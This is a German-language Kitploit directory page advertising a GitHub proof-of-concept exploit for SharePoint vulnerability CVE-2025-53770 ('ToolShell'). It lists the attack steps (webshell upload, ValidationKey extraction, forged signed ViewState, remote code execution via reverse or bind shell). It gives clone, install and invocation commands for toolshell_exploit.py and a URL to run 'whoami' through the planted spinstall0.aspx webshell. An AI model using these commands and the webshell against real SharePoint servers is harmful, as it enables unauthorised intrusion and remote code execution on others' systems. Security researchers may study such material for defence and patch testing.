Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Toolshell_CVE-2025-53770 | Kitploit
Tools/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Payload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Toolshell_CVE-2025-53770

Repository anzeigen
vor 1 JahrNoch nicht geprüft

ToolShell → CVE‑2025‑53770 Exploit PoC

Mit diesem Paket können Sie:

  1. Webshell hochladen auf SharePoint
  2. ValidationKey extrahieren
  3. Signierten ViewState erzeugen
  4. RCE per Reverse-/Bind-Shell

🔧 Einrichtung

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 Ausführung

Webshell hochladen

Auf einer SharePoint-Seite kannst du auf den Seitenquelltext zugreifen. Gehe einfach auf den Tab „Quelltext anzeigen“ und von dort erhältst du, falls verfügbar, Folgendes, das du kopieren kannst:

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (beliebige aktuelle __VIEWSTATE für den Kontext)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

Dadurch wird spinstall0.aspx hochgeladen. Prüfen: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

Tool herunterladen